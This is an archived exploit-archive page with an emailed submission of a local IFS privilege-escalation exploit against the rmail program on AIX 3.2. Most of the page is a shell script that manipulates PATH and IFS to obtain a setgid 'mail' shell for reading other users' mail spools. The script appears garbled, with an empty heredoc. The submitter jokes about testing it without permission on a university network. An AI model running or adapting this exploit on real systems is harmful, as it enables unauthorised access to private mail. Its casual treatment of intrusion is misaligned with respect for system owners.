AIX rmail hole

Description:IFS attack, apparently AIX may be using system()
Compromise:gid mail
Vulnerable Systems:AIX 3.2, perhaps earlier
Date:10 May 1998 (it is actually much older)
Notes:Thanks to the person who submitted this to me!

Date: Sun, 10 May 1998 08:34:23 PDT
From: [ CUT ]
Subject: AIX oldie

hi fyodor,

first let met tell you that your pages are great - but you already
know that, don't you?

i noticed you have an exploit section sorted by os; here's an oldie
but goodie for AIX boxes running 3.2, the exploit gives a gid of "mail"
and therefore enables you to read the contents of /var/spool/mail etc.
i successfully tested it under AIX 3.2.5 on my university's network,
which really brought me into some trouble ;)

i guess you probably know of this ancient IFS hole; just in case you
wanted to include it into your pages ...

cya & keep up the marvelous work,


# IFS hole in AIX3.2 rmail gives egid=mail.
# Setup needed files.

mkdir /tmp/.rmail
cd /tmp/.rmail

cat <usr
cp sh mailsh
chmod 2777 mailsh
chmod 777 usr
ln -s /bin/sh .

# Set PATH, IFS, and run rmail.

setenv PATH .:$PATH
setenv IFS /
echo "cheezy mail hack" | rmail
unsetenv IFS
rm -f usr sh # minor cleanup. 
echo "Attempting to run sgid shell."

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: